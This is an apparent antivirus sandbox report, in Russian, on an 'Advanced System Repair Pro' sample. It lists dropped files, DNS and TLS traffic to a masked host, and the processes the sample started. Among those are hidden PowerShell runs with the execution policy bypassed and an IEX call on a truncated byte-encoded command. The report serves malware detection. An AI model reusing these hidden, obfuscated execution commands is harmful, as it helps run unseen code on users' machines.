Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %APPDATA%\idxds2021fr.vbs
- %ProgramFiles(x86)%\advanced system repair inc\advanced system repair pro\asrinstaller.exe
- %TEMP%\$inst\0001.tmp
- %TEMP%\$inst\0002.tmp
- %ProgramFiles(x86)%\advanced system repair inc\advanced system repair pro\uninstall.exe
- %ProgramFiles(x86)%\advanced system repair inc\advanced system repair pro\uninstall.ini
- %ALLUSERSPROFILE%\asr8settings\s3.txt
Удаляет следующие файлы
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\0001.tmp
- %TEMP%\$inst\0002.tmp
Сетевая активность
TCP
- 'i.###4top.io':443
UDP
- DNS ASK i.###4top.io
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\IDXDS2021FR.vbs"
- '%ProgramFiles(x86)%\advanced system repair inc\advanced system repair pro\asrinstaller.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -File %TEMP%\SystemSecurity32.PS1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,...
